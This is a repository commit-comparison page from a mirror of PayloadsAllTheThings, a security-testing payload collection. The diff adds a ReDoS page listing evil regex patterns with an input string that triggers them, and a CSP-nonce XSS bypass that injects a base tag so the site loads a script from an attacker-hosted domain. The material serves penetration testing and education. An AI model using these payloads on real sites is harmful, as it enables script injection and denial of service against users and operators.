mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-09 03:26:07 +02:00
Compare commits
3 Commits
4ea1af213f
...
03b35031c4
Author | SHA1 | Date | |
---|---|---|---|
Pol Lamothe | 03b35031c4 | ||
Swissky | 53d9014b2b | ||
Pol Lamothe | 443ce7a38a |
|
@ -75,6 +75,7 @@ Use : https://github.com/ozguralp/gmapsapiscanner/
|
|||
|
||||
|
||||
Impact:
|
||||
|
||||
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
|
||||
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
|
||||
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
# Regular Expression
|
||||
|
||||
> Regular Expression Denial of Service (ReDoS) is a type of attack that exploits the fact that certain regular expressions can take an extremely long time to process, causing applications or services to become unresponsive or crash.
|
||||
|
||||
|
||||
## Denial of Service - ReDoS
|
||||
|
||||
* [tjenkinson/redos-detector](https://github.com/tjenkinson/redos-detector) - A CLI and library which tests with certainty if a regex pattern is safe from ReDoS attacks. Supported in the browser, Node and Deno.
|
||||
* [doyensec/regexploit](https://github.com/doyensec/regexploit) - Find regular expressions which are vulnerable to ReDoS (Regular Expression Denial of Service)
|
||||
* [devina.io/redos-checker](https://devina.io/redos-checker) - Examine regular expressions for potential Denial of Service vulnerabilities
|
||||
|
||||
|
||||
### Evil Regex
|
||||
|
||||
Evil Regex contains:
|
||||
|
||||
* Grouping with repetition
|
||||
* Inside the repeated group:
|
||||
* Repetition
|
||||
* Alternation with overlapping
|
||||
|
||||
**Examples**
|
||||
|
||||
* `(a+)+`
|
||||
* `([a-zA-Z]+)*`
|
||||
* `(a|aa)+`
|
||||
* `(a|a?)+`
|
||||
* `(.*a){x}` for x \> 10
|
||||
|
||||
These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||||
* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
|
|
@ -81,6 +81,7 @@
|
|||
- [Bypass CSP by Rhynorater](#bypass-csp-by-rhynorater)
|
||||
- [Bypass CSP by @akita_zen](#bypass-csp-by-akita_zen)
|
||||
- [Bypass CSP by @404death](#bypass-csp-by-404death)
|
||||
- [Bypass CSP nonce by @PolLamothe](#bypass-csp-nonce-by-pollamothe)
|
||||
- [Common WAF Bypass](#common-waf-bypass)
|
||||
- [Cloudflare XSS Bypasses by @Bohdan Korzhynskyi](#cloudflare-xss-bypasses-by-bohdan-korzhynskyi)
|
||||
- [25st January 2021](#25st-january-2021)
|
||||
|
@ -1148,6 +1149,20 @@ Works for CSP like `script-src 'self' data:` as warned about in the official [mo
|
|||
<script src="data:,alert(1)">/</script>
|
||||
```
|
||||
|
||||
### Bypass CSP nonce by [@PolLamothe](https://github.com/PolLamothe)
|
||||
|
||||
Works for CSP like `script-src 'nonce-RANDOM_NONCE'`
|
||||
|
||||
**This can work only if the site has a js file imported with a path that don't include the URL**. Like this : `<script src='/PATH.js'></script>`
|
||||
|
||||
You have to inject this html element :
|
||||
```html
|
||||
<Base Href=http://www.yoursite.com>
|
||||
```
|
||||
|
||||
Now you have to host your custom js file at the same path that one of the website's script.
|
||||
|
||||
So the site will use this js file : `http://www.yoursite.com/PATH.js`
|
||||
|
||||
## Common WAF Bypass
|
||||
|
||||
|
|
Loading…
Reference in New Issue